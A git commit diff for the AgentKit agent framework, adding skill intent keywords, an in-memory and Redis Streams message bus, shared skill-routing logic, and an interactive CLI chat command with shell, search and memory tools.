merge: integrate feat/agentkit-phase8-chat-adaptive (chat/gui commands + GUI mode)

Restores agentkit chat, agentkit gui CLI commands, onboarding wizard,
and GUI mode (AGENTKIT_GUI_MODE) with static file serving.
Resolves merge conflicts in orchestrator.py, app.py, tools/__init__.py, shell.py.
This commit is contained in:
chiguyong 2026-06-10 07:44:06 +08:00
commit 7874e875af
58 changed files with 8794 additions and 42 deletions

View File

@ -9,6 +9,14 @@ supported_tasks:
max_concurrency: 3 max_concurrency: 3
custom_handler: "configs.geo_handlers.handle_citation_task" custom_handler: "configs.geo_handlers.handle_citation_task"
intent:
keywords: ["引用检测", "引用分析", "AI引用", "citation", "引用率", "被引用"]
description: "用户需要检测品牌在各AI平台回答中的引用情况"
examples:
- "检测我们的品牌在AI平台的引用情况"
- "分析品牌引用率"
- "哪些AI平台引用了我们"
input_schema: input_schema:
type: object type: object
properties: properties:

View File

@ -87,7 +87,7 @@ prompt:
examples: "" examples: ""
llm: llm:
model: "deepseek" model: "default"
temperature: 0.7 temperature: 0.7
max_tokens: 4000 max_tokens: 4000

View File

@ -7,6 +7,14 @@ supported_tasks:
- deai_process - deai_process
max_concurrency: 2 max_concurrency: 2
intent:
keywords: ["去AI化", "去ai", "去AI", "人性化", "改写", "deai", "humanize", "自然化"]
description: "用户需要将AI生成的文本改写为更自然、人类化的表达"
examples:
- "帮我把这篇文章去AI化"
- "让这段文字更自然"
- "改写得像人写的"
input_schema: input_schema:
type: object type: object
required: required:
@ -61,7 +69,7 @@ prompt:
examples: "" examples: ""
llm: llm:
model: "deepseek" model: "default"
temperature: 0.9 temperature: 0.9
max_tokens: 8000 max_tokens: 8000

View File

@ -7,6 +7,14 @@ supported_tasks:
- geo_optimize - geo_optimize
max_concurrency: 2 max_concurrency: 2
intent:
keywords: ["GEO优化", "SEO优化", "内容优化", "优化文章", "geo", "seo", "optimize"]
description: "用户需要对文章进行GEO/SEO优化提升在AI搜索引擎中的可见性"
examples:
- "帮我优化这篇文章的SEO"
- "GEO优化一下"
- "提升文章在AI搜索中的排名"
input_schema: input_schema:
type: object type: object
required: required:
@ -64,7 +72,7 @@ prompt:
examples: "" examples: ""
llm: llm:
model: "deepseek" model: "default"
temperature: 0.5 temperature: 0.5
max_tokens: 8000 max_tokens: 8000

View File

@ -9,6 +9,14 @@ supported_tasks:
max_concurrency: 3 max_concurrency: 3
custom_handler: "configs.geo_handlers.handle_monitor_task" custom_handler: "configs.geo_handlers.handle_monitor_task"
intent:
keywords: ["效果追踪", "监测", "监控", "monitor", "追踪", "排名变化"]
description: "用户需要监测品牌引用量、情感、排名变化"
examples:
- "监测品牌引用变化"
- "追踪效果"
- "品牌排名变化"
input_schema: input_schema:
type: object type: object
required: required:

View File

@ -8,6 +8,14 @@ supported_tasks:
max_concurrency: 2 max_concurrency: 2
custom_handler: "configs.geo_handlers.handle_schema_task" custom_handler: "configs.geo_handlers.handle_schema_task"
intent:
keywords: ["Schema", "结构化数据", "JSON-LD", "schema", "schema优化"]
description: "用户需要识别Schema缺失维度生成结构化数据建议"
examples:
- "帮我优化Schema"
- "生成JSON-LD结构化数据"
- "Schema有什么可以改进的"
input_schema: input_schema:
type: object type: object
required: required:

View File

@ -0,0 +1,14 @@
"""AgentKit Bus - Agent 间通信基础设施"""
from agentkit.bus.message import AgentMessage
from agentkit.bus.protocol import MessageBus
from agentkit.bus.memory_bus import InMemoryMessageBus
from agentkit.bus.redis_bus import RedisMessageBus, create_message_bus
__all__ = [
"AgentMessage",
"MessageBus",
"InMemoryMessageBus",
"RedisMessageBus",
"create_message_bus",
]

View File

@ -0,0 +1,143 @@
"""InMemoryMessageBus — 基于 asyncio.Queue 的内存消息总线。
用于开发和测试行为与 Redis 实现一致
"""
from __future__ import annotations
import asyncio
import logging
from typing import Any, Callable, Awaitable
from agentkit.bus.message import AgentMessage
logger = logging.getLogger(__name__)
class InMemoryMessageBus:
"""基于 asyncio.Queue 的内存消息总线。"""
def __init__(self) -> None:
self._subscribers: dict[str, list[Callable[[AgentMessage], Awaitable[None]]]] = {}
self._pending_requests: dict[str, asyncio.Future[AgentMessage]] = {}
self._queues: dict[str, asyncio.Queue[AgentMessage]] = {}
async def publish(self, message: AgentMessage) -> None:
"""发布消息。"""
if message.is_broadcast:
await self.broadcast(message)
return
# Point-to-point: deliver to recipient's queue
recipient = message.recipient
if recipient and recipient in self._queues:
await self._queues[recipient].put(message)
elif recipient and recipient in self._subscribers:
# No queue, call handlers directly
for handler in self._subscribers[recipient]:
try:
await handler(message)
except Exception as e:
logger.warning(f"Handler error for {recipient}: {e}")
# Check if this is a response to a pending request
# Only resolve if this is a reply (message_id != correlation_id),
# not the original request itself
if (
message.correlation_id
and message.correlation_id in self._pending_requests
and message.message_id != message.correlation_id
):
future = self._pending_requests[message.correlation_id]
if not future.done():
future.set_result(message)
async def subscribe(
self,
agent_name: str,
handler: Callable[[AgentMessage], Awaitable[None]],
) -> None:
"""订阅消息。"""
if agent_name not in self._subscribers:
self._subscribers[agent_name] = []
self._queues[agent_name] = asyncio.Queue()
self._subscribers[agent_name].append(handler)
# Start consumer task
asyncio.create_task(self._consume_queue(agent_name, handler))
async def _consume_queue(
self,
agent_name: str,
handler: Callable[[AgentMessage], Awaitable[None]],
) -> None:
"""消费队列中的消息。"""
queue = self._queues.get(agent_name)
if queue is None:
return
while True:
try:
message = await queue.get()
try:
await handler(message)
except Exception as e:
logger.warning(f"Handler error for {agent_name}: {e}")
except asyncio.CancelledError:
break
async def unsubscribe(self, agent_name: str) -> None:
"""取消订阅。"""
self._subscribers.pop(agent_name, None)
self._queues.pop(agent_name, None)
async def request(
self,
message: AgentMessage,
timeout: float = 30.0,
) -> AgentMessage:
"""请求-响应模式。"""
if not message.correlation_id:
message.correlation_id = message.message_id
loop = asyncio.get_event_loop()
future: asyncio.Future[AgentMessage] = loop.create_future()
self._pending_requests[message.correlation_id] = future
try:
await self.publish(message)
return await asyncio.wait_for(future, timeout=timeout)
except asyncio.TimeoutError:
raise TimeoutError(
f"Request {message.correlation_id} timed out after {timeout}s"
)
finally:
self._pending_requests.pop(message.correlation_id, None)
async def broadcast(self, message: AgentMessage) -> None:
"""广播消息。"""
# Ensure recipient is None for broadcast
message.recipient = None
for agent_name, handlers in self._subscribers.items():
for handler in handlers:
try:
await handler(message)
except Exception as e:
logger.warning(f"Broadcast handler error for {agent_name}: {e}")
# Check pending requests (only for replies)
if (
message.correlation_id
and message.correlation_id in self._pending_requests
and message.message_id != message.correlation_id
):
future = self._pending_requests[message.correlation_id]
if not future.done():
future.set_result(message)
async def health_check(self) -> bool:
return True
@property
def backend_type(self) -> str:
return "memory"

View File

@ -0,0 +1,54 @@
"""AgentMessage — Agent 间通信消息模型。"""
from __future__ import annotations
import uuid
from dataclasses import dataclass, field
from datetime import datetime, timezone
from typing import Any
@dataclass
class AgentMessage:
"""Agent 间通信消息。
支持点对点recipient 非空和广播recipient None两种模式
通过 correlation_id 实现请求-响应关联
"""
message_id: str = field(default_factory=lambda: str(uuid.uuid4())[:12])
sender: str = ""
recipient: str | None = None # None = broadcast
topic: str = ""
payload: dict[str, Any] = field(default_factory=dict)
timestamp: str = field(
default_factory=lambda: datetime.now(timezone.utc).isoformat(),
)
correlation_id: str | None = None # 请求-响应关联
def to_dict(self) -> dict[str, Any]:
return {
"message_id": self.message_id,
"sender": self.sender,
"recipient": self.recipient,
"topic": self.topic,
"payload": self.payload,
"timestamp": self.timestamp,
"correlation_id": self.correlation_id,
}
@classmethod
def from_dict(cls, data: dict[str, Any]) -> AgentMessage:
return cls(
message_id=data.get("message_id", ""),
sender=data.get("sender", ""),
recipient=data.get("recipient"),
topic=data.get("topic", ""),
payload=data.get("payload", {}),
timestamp=data.get("timestamp", ""),
correlation_id=data.get("correlation_id"),
)
@property
def is_broadcast(self) -> bool:
return self.recipient is None

View File

@ -0,0 +1,61 @@
"""MessageBus Protocol — Agent 间通信抽象层。"""
from __future__ import annotations
from typing import Any, Callable, Awaitable, Protocol as TypingProtocol, runtime_checkable
from agentkit.bus.message import AgentMessage
@runtime_checkable
class MessageBus(TypingProtocol):
"""Agent 间通信总线协议。
支持三种通信模式
- 点对点publish() 指定 recipient
- 广播publish() 不指定 recipient broadcast()
- 请求-响应request() 等待对方通过 correlation_id 回复
"""
async def publish(self, message: AgentMessage) -> None:
"""发布消息。如果 message.recipient 为 None则广播。"""
...
async def subscribe(
self,
agent_name: str,
handler: Callable[[AgentMessage], Awaitable[None]],
) -> None:
"""订阅消息。handler 在收到消息时被调用。"""
...
async def unsubscribe(self, agent_name: str) -> None:
"""取消订阅。"""
...
async def request(
self,
message: AgentMessage,
timeout: float = 30.0,
) -> AgentMessage:
"""请求-响应模式。发送消息并等待回复。
Args:
message: 请求消息
timeout: 超时秒数
Returns:
响应消息
Raises:
TimeoutError: 超时未收到响应
"""
...
async def broadcast(self, message: AgentMessage) -> None:
"""广播消息给所有订阅者。"""
...
async def health_check(self) -> bool:
"""健康检查。"""
...

View File

@ -0,0 +1,268 @@
"""RedisMessageBus — 基于 Redis Streams 的消息总线。
使用 XADD/XREADGROUP 实现可靠消息传递支持消费者组
消息确认和死信队列
"""
from __future__ import annotations
import asyncio
import json
import logging
from typing import Any, Callable, Awaitable
from agentkit.bus.message import AgentMessage
from agentkit.bus.memory_bus import InMemoryMessageBus
logger = logging.getLogger(__name__)
_STREAM_PREFIX = "agentkit:bus:"
_DEAD_LETTER_SUFFIX = ":dead"
class RedisMessageBus:
"""基于 Redis Streams 的消息总线。"""
def __init__(
self,
redis_url: str = "redis://localhost:6379/0",
consumer_group: str = "agentkit_bus",
max_retries: int = 3,
) -> None:
self._redis_url = redis_url
self._consumer_group = consumer_group
self._max_retries = max_retries
self._redis: Any = None
self._subscribers: dict[str, list[Callable[[AgentMessage], Awaitable[None]]]] = {}
self._pending_requests: dict[str, asyncio.Future[AgentMessage]] = {}
self._consumer_tasks: dict[str, asyncio.Task] = {}
async def _get_redis(self) -> Any:
"""获取 Redis 连接(懒初始化)。"""
if self._redis is None:
import redis.asyncio as aioredis
self._redis = aioredis.from_url(self._redis_url, decode_responses=True)
return self._redis
def _stream_key(self, agent_name: str) -> str:
return f"{_STREAM_PREFIX}{agent_name}"
def _dead_letter_key(self, agent_name: str) -> str:
return f"{_STREAM_PREFIX}{agent_name}{_DEAD_LETTER_SUFFIX}"
async def publish(self, message: AgentMessage) -> None:
"""发布消息。"""
if message.is_broadcast:
await self.broadcast(message)
return
redis = await self._get_redis()
stream_key = self._stream_key(message.recipient)
data = message.to_dict()
try:
await redis.xadd(stream_key, {"data": json.dumps(data)})
except Exception as e:
logger.error(f"Failed to publish message to {stream_key}: {e}")
raise
# Check pending requests (only for replies, not original request)
if (
message.correlation_id
and message.correlation_id in self._pending_requests
and message.message_id != message.correlation_id
):
future = self._pending_requests[message.correlation_id]
if not future.done():
future.set_result(message)
async def subscribe(
self,
agent_name: str,
handler: Callable[[AgentMessage], Awaitable[None]],
) -> None:
"""订阅消息。"""
if agent_name not in self._subscribers:
self._subscribers[agent_name] = []
self._subscribers[agent_name].append(handler)
# Start consumer task
if agent_name not in self._consumer_tasks:
task = asyncio.create_task(
self._consume_stream(agent_name),
)
self._consumer_tasks[agent_name] = task
async def _consume_stream(self, agent_name: str) -> None:
"""消费 Redis Stream 中的消息。"""
redis = await self._get_redis()
stream_key = self._stream_key(agent_name)
# Create consumer group if not exists
try:
await redis.xgroup_create(
stream_key, self._consumer_group, id="0", mkstream=True,
)
except Exception:
pass # Group already exists
while True:
try:
results = await redis.xreadgroup(
groupname=self._consumer_group,
consumername=agent_name,
streams={stream_key: ">"},
count=10,
block=1000,
)
if results:
for stream_name, messages in results:
for msg_id, fields in messages:
try:
data = json.loads(fields.get("data", "{}"))
message = AgentMessage.from_dict(data)
for handler in self._subscribers.get(agent_name, []):
try:
await handler(message)
except Exception as e:
logger.warning(f"Handler error for {agent_name}: {e}")
# Acknowledge message
await redis.xack(stream_key, self._consumer_group, msg_id)
except Exception as e:
logger.warning(f"Failed to process message {msg_id}: {e}")
# Move to dead letter after max retries
await self._handle_failed_message(
redis, stream_key, msg_id, fields, agent_name,
)
except asyncio.CancelledError:
break
except Exception as e:
logger.error(f"Consumer error for {agent_name}: {e}")
await asyncio.sleep(1)
async def _handle_failed_message(
self,
redis: Any,
stream_key: str,
msg_id: str,
fields: dict,
agent_name: str,
) -> None:
"""处理失败消息(移入死信队列)。"""
dead_key = self._dead_letter_key(agent_name)
try:
await redis.xadd(dead_key, fields)
await redis.xack(stream_key, self._consumer_group, msg_id)
logger.warning(f"Message {msg_id} moved to dead letter queue")
except Exception as e:
logger.error(f"Failed to move message to dead letter: {e}")
async def unsubscribe(self, agent_name: str) -> None:
"""取消订阅。"""
self._subscribers.pop(agent_name, None)
task = self._consumer_tasks.pop(agent_name, None)
if task:
task.cancel()
try:
await task
except asyncio.CancelledError:
pass
async def request(
self,
message: AgentMessage,
timeout: float = 30.0,
) -> AgentMessage:
"""请求-响应模式。"""
if not message.correlation_id:
message.correlation_id = message.message_id
loop = asyncio.get_event_loop()
future: asyncio.Future[AgentMessage] = loop.create_future()
self._pending_requests[message.correlation_id] = future
try:
await self.publish(message)
return await asyncio.wait_for(future, timeout=timeout)
except asyncio.TimeoutError:
raise TimeoutError(
f"Request {message.correlation_id} timed out after {timeout}s"
)
finally:
self._pending_requests.pop(message.correlation_id, None)
async def broadcast(self, message: AgentMessage) -> None:
"""广播消息。"""
message.recipient = None
redis = await self._get_redis()
data = message.to_dict()
for agent_name in self._subscribers:
stream_key = self._stream_key(agent_name)
try:
await redis.xadd(stream_key, {"data": json.dumps(data)})
except Exception as e:
logger.error(f"Failed to broadcast to {agent_name}: {e}")
# Check pending requests (only for replies)
if (
message.correlation_id
and message.correlation_id in self._pending_requests
and message.message_id != message.correlation_id
):
future = self._pending_requests[message.correlation_id]
if not future.done():
future.set_result(message)
async def health_check(self) -> bool:
try:
redis = await self._get_redis()
return await redis.ping()
except Exception:
return False
@property
def backend_type(self) -> str:
return "redis_streams"
def create_message_bus(
backend: str = "memory",
redis_url: str = "redis://localhost:6379/0",
consumer_group: str = "agentkit_bus",
max_retries: int = 3,
) -> InMemoryMessageBus | RedisMessageBus:
"""创建消息总线实例。
Args:
backend: "memory" "redis"
redis_url: Redis 连接 URL
consumer_group: Redis 消费者组名称
max_retries: 消息最大重试次数
Returns:
MessageBus 实例
"""
if backend == "redis":
try:
import redis.asyncio as aioredis # noqa: F401
bus = RedisMessageBus(
redis_url=redis_url,
consumer_group=consumer_group,
max_retries=max_retries,
)
logger.info(f"MessageBus backend: redis_streams ({redis_url})")
return bus
except Exception as exc:
logger.warning(
f"Failed to initialise RedisMessageBus ({exc}), "
f"falling back to InMemoryMessageBus"
)
bus = InMemoryMessageBus()
logger.info("MessageBus backend: memory")
return bus

View File

View File

@ -0,0 +1,168 @@
"""Shared skill routing logic for GUI and CLI chat.
Extracts the duplicated skill routing, @skill: prefix parsing,
and prompt assembly into a single module used by both chat routes.
"""
from __future__ import annotations
import logging
import re
from dataclasses import dataclass, field
from typing import Any
logger = logging.getLogger(__name__)
# Strict validation: only lowercase alphanumeric, hyphens, underscores
_SKILL_NAME_RE = re.compile(r"^[a-z0-9][a-z0-9_-]{0,63}$")
def validate_skill_name(name: str) -> str:
"""Validate and normalize a skill name. Raises ValueError on invalid input."""
normalized = name.strip().lower()
if not _SKILL_NAME_RE.match(normalized):
raise ValueError(
f"Invalid skill name '{name}': must match [a-z0-9][a-z0-9_-]{{0,63}}"
)
return normalized
@dataclass
class SkillRoutingResult:
"""Result of skill routing for a user message."""
skill_name: str | None = None
skill_config: Any = None
skill_tools: list = field(default_factory=list)
clean_content: str = ""
system_prompt: str | None = None
tools: list = field(default_factory=list)
model: str = "default"
agent_name: str | None = None
matched: bool = False
match_method: str | None = None
match_confidence: float = 0.0
def parse_skill_prefix(content: str) -> tuple[str | None, str]:
"""Parse @skill:name prefix from user message.
Returns (skill_name_or_None, clean_content).
"""
if not content.startswith("@skill:"):
return None, content
parts = content.split(" ", 1)
skill_ref = parts[0][7:] # strip "@skill:"
explicit_skill = skill_ref.strip()
clean = parts[1].strip() if len(parts) > 1 else content[7 + len(skill_ref):].strip()
return explicit_skill, clean
def build_skill_system_prompt(skill_config) -> str | None:
"""Build system prompt from skill config's prompt section."""
if not skill_config or not skill_config.prompt:
return None
prompt_parts = []
for key in ("identity", "context", "instructions", "constraints", "output_format"):
val = skill_config.prompt.get(key)
if val:
prompt_parts.append(val)
return "\n\n".join(prompt_parts) if prompt_parts else None
async def resolve_skill_routing(
content: str,
skill_registry: Any,
intent_router: Any,
default_tools: list,
default_system_prompt: str | None,
default_model: str = "default",
default_agent_name: str = "default",
agent_tool_registry: Any = None,
session_id: str = "",
) -> SkillRoutingResult:
"""Resolve skill routing for a user message.
This is the shared entry point used by both GUI WebSocket chat and CLI chat.
Returns a SkillRoutingResult with all execution parameters set.
"""
result = SkillRoutingResult()
# Parse @skill: prefix
explicit_skill, clean_content = parse_skill_prefix(content)
result.clean_content = clean_content
if explicit_skill:
logger.info(f"Session {session_id}: explicit skill reference: {explicit_skill}")
# Try explicit skill match
if explicit_skill and skill_registry:
try:
matched_skill = skill_registry.get(explicit_skill)
result.skill_name = explicit_skill
result.skill_config = matched_skill.config
result.skill_tools = matched_skill.tools or []
result.matched = True
result.match_method = "explicit"
result.match_confidence = 1.0
logger.info(f"Session {session_id}: using explicit skill '{explicit_skill}'")
except Exception as e:
logger.warning(f"Session {session_id}: explicit skill '{explicit_skill}' not found: {e}")
# Reset so we don't enter skill branch with stale data
result.skill_name = None
result.skill_config = None
# Try IntentRouter if no explicit match
if not result.matched and skill_registry and intent_router:
skills = skill_registry.list_skills()
routable_skills = [s for s in skills if s.config.intent.keywords]
if routable_skills:
try:
routing_result = await intent_router.route(
input_data={"content": clean_content},
skills=routable_skills,
)
if routing_result and routing_result.confidence >= 0.5:
skill_name = routing_result.matched_skill
try:
matched_skill = skill_registry.get(skill_name)
result.skill_name = skill_name
result.skill_config = matched_skill.config
result.skill_tools = matched_skill.tools or []
result.matched = True
result.match_method = routing_result.method
result.match_confidence = routing_result.confidence
logger.info(
f"Session {session_id}: routed to skill '{skill_name}' "
f"via {routing_result.method} (confidence={routing_result.confidence})"
)
except Exception as e:
logger.warning(f"Session {session_id}: skill '{skill_name}' found by router but not in registry: {e}")
except Exception as e:
logger.warning(f"Skill routing failed for session {session_id}: {e}")
# Determine execution parameters
if result.matched and result.skill_config:
skill_prompt = build_skill_system_prompt(result.skill_config)
result.system_prompt = skill_prompt or default_system_prompt
# Merge skill tools with agent tools, deduplicating by name
agent_tools = agent_tool_registry.list_tools() if agent_tool_registry else default_tools
seen_names = set()
merged_tools = []
for tool in result.skill_tools + agent_tools:
if tool.name not in seen_names:
seen_names.add(tool.name)
merged_tools.append(tool)
result.tools = merged_tools
result.model = result.skill_config.llm.get("model", default_model) if result.skill_config.llm else default_model
result.agent_name = result.skill_name
else:
result.system_prompt = default_system_prompt
result.tools = default_tools
result.model = default_model
result.agent_name = default_agent_name
return result

422
src/agentkit/cli/chat.py Normal file
View File

@ -0,0 +1,422 @@
"""Chat command — interactive terminal chat with an Agent.
Runs a lightweight in-process server and opens a REPL-style chat session.
No external server or Docker needed.
Usage:
agentkit chat # Start chatting (auto-onboard if no config)
agentkit chat --model deepseek/deepseek-chat # Use specific model
"""
from __future__ import annotations
import asyncio
import os
from typing import Any
import typer
from rich import print as rprint
from rich.panel import Panel
from rich.prompt import Prompt
from rich.markdown import Markdown
from rich.live import Live
from rich.text import Text
from rich.console import Group
def chat(
model: str = typer.Option("default", "--model", "-m", help="LLM model to use (e.g. deepseek/deepseek-chat)"),
agent_name: str = typer.Option("default", "--agent", "-a", help="Agent name to chat with"),
config: str | None = typer.Option(None, "--config", "-c", help="Path to agentkit.yaml"),
system_prompt: str | None = typer.Option(None, "--system-prompt", "-s", help="Custom system prompt"),
no_stream: bool = typer.Option(False, "--no-stream", help="Disable token streaming"),
):
"""Start an interactive chat session with an Agent."""
asyncio.run(_chat_async(model, agent_name, config, system_prompt, no_stream))
async def _chat_async(
model: str,
agent_name: str,
config_arg: str | None,
system_prompt: str | None,
no_stream: bool,
) -> None:
"""Async implementation of the chat command."""
from agentkit.cli.onboarding import run_onboarding
from agentkit.server.config import ServerConfig, find_config_path
# ── Onboarding check ──────────────────────────────────────────
config_path = find_config_path(config_arg)
if config_path is None:
config_path = run_onboarding(config_arg=config_arg)
if config_path is None:
rprint("[red]Onboarding cancelled. Cannot start chat without configuration.[/red]")
raise typer.Exit(code=1)
# ── Load config ───────────────────────────────────────────────
rprint(f"[dim]Loading config from {config_path}[/dim]")
# Load .env
from pathlib import Path
dotenv = Path(config_path).parent / ".env"
if dotenv.exists():
_load_dotenv(str(dotenv))
server_config = ServerConfig.from_yaml(config_path)
# ── Build in-process components ───────────────────────────────
from agentkit.session.manager import SessionManager
from agentkit.session.store import InMemorySessionStore
from agentkit.session.models import MessageRole
from agentkit.core.react import ReActEngine
from agentkit.tools.base import Tool
from agentkit.memory.profile import MemoryStore
from agentkit.tools.memory_tool import MemoryTool
from agentkit.tools.shell import ShellTool
from agentkit.tools.web_search import WebSearchTool
from agentkit.tools.web_crawl import WebCrawlTool
# Build LLM Gateway
gateway = _build_gateway(server_config)
# Initialize memory store
memory_store = MemoryStore()
memory_store.ensure_defaults()
memory_snapshot = memory_store.load_all()
# Create session
session_manager = SessionManager(store=InMemorySessionStore())
session = await session_manager.create_session(agent_name=agent_name)
# Build tools list — all available tools for chat mode
search_api_keys = _extract_search_keys(server_config)
tools: list[Tool] = [
MemoryTool(memory_store=memory_store),
ShellTool(working_dir=os.getcwd()),
WebSearchTool(**search_api_keys),
WebCrawlTool(),
]
# ── Load skills and build IntentRouter ───────────────────────
from agentkit.tools.registry import ToolRegistry
from agentkit.skills.registry import SkillRegistry
from agentkit.skills.loader import SkillLoader
from agentkit.router.intent import IntentRouter
tool_registry = ToolRegistry()
for tool in tools:
tool_registry.register(tool)
skill_registry = SkillRegistry()
if server_config.skill_paths:
loader = SkillLoader(skill_registry=skill_registry, tool_registry=tool_registry)
for skill_path in server_config.skill_paths:
from pathlib import Path as _P
p = _P(skill_path)
if p.is_dir():
loaded = loader.load_from_directory(str(p))
if loaded:
rprint(f"[dim]Loaded {len(loaded)} skills from {p}[/dim]")
elif p.is_file() and p.suffix in (".yaml", ".yml"):
try:
loader.load_from_file(str(p))
except Exception:
pass
intent_router = IntentRouter(llm_gateway=gateway) if skill_registry.list_skills() else None
# Build system prompt — inject memory into system prompt
base_prompt = system_prompt or (
"你是一个有帮助的AI助手。请记住我们对话的上下文并在后续对话中引用之前的内容。回答要清晰简洁请使用中文回复。"
)
effective_system_prompt = memory_store.build_system_prompt(memory_snapshot, base_prompt)
# Resolve agent display name from SOUL.md
agent_display_name = memory_store.get_file("soul").read_section("身份") or agent_name
# Extract just the name (first line after "我是")
for prefix in ["我是", "我叫", "我的名字是"]:
if prefix in agent_display_name:
name_part = agent_display_name.split(prefix, 1)[1].strip()
# Take first meaningful token (before comma, period, etc.)
for sep in ["", "", "", ",", ".", " "]:
if sep in name_part:
name_part = name_part.split(sep)[0]
break
agent_display_name = name_part
break
# ── Welcome banner ────────────────────────────────────────────
effective_model = model if model != "default" else _resolve_default_model(server_config)
rprint(Panel(
f"[bold]AgentKit Chat[/bold]\n\n"
f" Model: [cyan]{effective_model}[/cyan]\n"
f" Agent: [cyan]{agent_display_name}[/cyan]\n"
f" Session: [dim]{session.session_id[:8]}...[/dim]\n\n"
f" Type your message and press Enter.\n"
f" [dim]/help[/dim] — Show commands\n"
f" [dim]/clear[/dim] — Clear conversation\n"
f" [dim]/model <name>[/dim] — Switch model\n"
f" [dim]/quit[/dim] — Exit chat",
title="AgentKit",
border_style="bright_blue",
))
# ── Chat loop ─────────────────────────────────────────────────
react_engine = ReActEngine(llm_gateway=gateway)
current_model = effective_model
conversation_had_messages = False
while True:
try:
user_input = Prompt.ask("\n[bold green]You[/bold green]")
except (EOFError, KeyboardInterrupt):
rprint("\n[dim]Goodbye![/dim]")
break
if not user_input.strip():
continue
# Handle commands
if user_input.startswith("/"):
cmd = user_input.strip().lower()
if cmd in ("/quit", "/q", "/exit"):
rprint("[dim]Goodbye![/dim]")
break
elif cmd == "/help":
_print_help()
continue
elif cmd == "/clear":
# Create a new session (memory files persist)
session = await session_manager.create_session(agent_name=agent_name)
rprint("[dim]Conversation cleared. New session started.[/dim]")
continue
elif cmd.startswith("/model "):
current_model = cmd.split(" ", 1)[1].strip()
rprint(f"[dim]Switched to model: {current_model}[/dim]")
continue
else:
rprint(f"[yellow]Unknown command: {cmd}[/yellow]")
continue
conversation_had_messages = True
# Append user message to session
await session_manager.append_message(
session_id=session.session_id,
role=MessageRole.USER,
content=user_input,
)
# Get full conversation history (includes all previous turns)
chat_messages = await session_manager.get_chat_messages(session.session_id)
# ── Skill routing ─────────────────────────────────────────
from agentkit.chat.skill_routing import resolve_skill_routing
routing = await resolve_skill_routing(
content=user_input,
skill_registry=skill_registry,
intent_router=intent_router,
default_tools=tools,
default_system_prompt=effective_system_prompt,
default_model=current_model,
default_agent_name=agent_name,
session_id=session.session_id,
)
if routing.matched:
rprint(f"[dim]Skill: {routing.skill_name} ({routing.match_method}, {int(routing.match_confidence * 100)}%)[/dim]")
exec_system_prompt = routing.system_prompt
exec_tools = routing.tools
exec_model = routing.model
# Print Agent label before streaming
rprint(f"\n[bold blue]{agent_display_name}[/bold blue]: ", end="")
# Execute Agent
try:
if no_stream:
# Non-streaming mode
result = await react_engine.execute(
messages=chat_messages,
tools=exec_tools,
model=exec_model,
agent_name=routing.skill_name or agent_name,
system_prompt=exec_system_prompt,
)
output = result.output if hasattr(result, "output") else str(result)
rprint(output)
await session_manager.append_message(
session_id=session.session_id,
role=MessageRole.ASSISTANT,
content=output,
agent_name=agent_name,
)
else:
# Streaming mode — Live displays under the "Agent:" label
full_content = ""
with Live(
Text(""),
refresh_per_second=15,
vertical_overflow="visible",
transient=False, # Keep final output on screen
) as live:
async for event in react_engine.execute_stream(
messages=chat_messages,
tools=exec_tools,
model=exec_model,
agent_name=routing.skill_name or agent_name,
system_prompt=exec_system_prompt,
):
if event.event_type == "token":
token = event.data.get("content", "")
full_content += token
live.update(Text(full_content))
elif event.event_type == "final_answer":
# Use final_answer output (may differ slightly from accumulated tokens)
full_content = event.data.get("output", full_content)
live.update(Markdown(full_content))
elif event.event_type == "tool_call":
tool_name = event.data.get("tool_name", "unknown")
live.update(Text(f"[calling tool: {tool_name}...]"))
elif event.event_type == "tool_result":
# After tool result, show accumulated content again
if full_content:
live.update(Text(full_content))
# Live already displayed the final content, no need to rprint again
await session_manager.append_message(
session_id=session.session_id,
role=MessageRole.ASSISTANT,
content=full_content,
agent_name=agent_name,
)
except Exception as e:
rprint(f"\n[red]Error: {e}[/red]")
# ── Session end: generate daily log ────────────────────────────
if conversation_had_messages:
try:
messages = await session_manager.get_messages(session.session_id)
if messages:
# Build a brief summary of the conversation
summary_parts = []
for msg in messages[-10:]: # Last 10 messages
role = msg.role.value if hasattr(msg.role, "value") else str(msg.role)
summary_parts.append(f"{role}: {msg.content[:100]}")
summary = "\n".join(summary_parts)
daily = memory_store.get_file("daily")
existing = daily.read()
new_entry = f"## 会话摘要\n{summary}"
if existing:
daily.write(f"{existing}\n\n{new_entry}")
else:
daily.write(new_entry)
# Archive old daily logs
memory_store.archive_old_dailies(keep_days=2)
except Exception:
pass # Daily log generation is best-effort
def _extract_search_keys(server_config: "ServerConfig") -> dict[str, str]:
"""Extract search API keys from server config environment."""
return {
"tavily_api_key": os.environ.get("TAVILY_API_KEY"),
"serper_api_key": os.environ.get("SERPER_API_KEY"),
}
def _build_gateway(server_config: "ServerConfig") -> "LLMGateway":
"""Build LLMGateway from ServerConfig, same logic as app.py."""
from agentkit.llm.gateway import LLMGateway
from agentkit.llm.providers.anthropic import AnthropicProvider
from agentkit.llm.providers.gemini import GeminiProvider
from agentkit.llm.providers.openai import OpenAICompatibleProvider
gateway = LLMGateway(config=server_config.llm_config)
for name, pconf in server_config.llm_config.providers.items():
if not pconf.api_key:
continue
try:
if pconf.type == "anthropic":
provider = AnthropicProvider(
api_key=pconf.api_key,
model=list(pconf.models.keys())[0] if pconf.models else "claude-sonnet-4-20250514",
max_tokens=pconf.max_tokens,
base_url=pconf.base_url or "https://api.anthropic.com",
timeout=pconf.timeout,
)
elif pconf.type == "gemini":
provider = GeminiProvider(
api_key=pconf.api_key,
model=list(pconf.models.keys())[0] if pconf.models else "gemini-2.0-flash",
max_output_tokens=pconf.max_tokens,
base_url=pconf.base_url or "https://generativelanguage.googleapis.com",
timeout=pconf.timeout,
)
else:
provider = OpenAICompatibleProvider(
api_key=pconf.api_key,
base_url=pconf.base_url,
)
gateway.register_provider(name, provider)
except Exception as e:
import logging
logging.getLogger(__name__).warning(f"Failed to register LLM provider '{name}': {e}")
return gateway
def _resolve_default_model(server_config: "ServerConfig") -> str:
"""Resolve the default model from config."""
if server_config.llm_config.model_aliases and "default" in server_config.llm_config.model_aliases:
return server_config.llm_config.model_aliases["default"]
# Fallback: first provider's first model
for name, pconf in server_config.llm_config.providers.items():
if pconf.api_key and pconf.models:
first_model = list(pconf.models.keys())[0]
return f"{name}/{first_model}"
return "default"
def _load_dotenv(dotenv_path: str) -> None:
"""Load .env file into environment."""
from pathlib import Path
path = Path(dotenv_path)
if not path.exists():
return
with open(path, encoding="utf-8") as f:
for line in f:
line = line.strip()
if not line or line.startswith("#"):
continue
if "=" not in line:
continue
key, _, value = line.partition("=")
key = key.strip()
value = value.strip().strip("\"'")
if key and key not in os.environ:
os.environ[key] = value
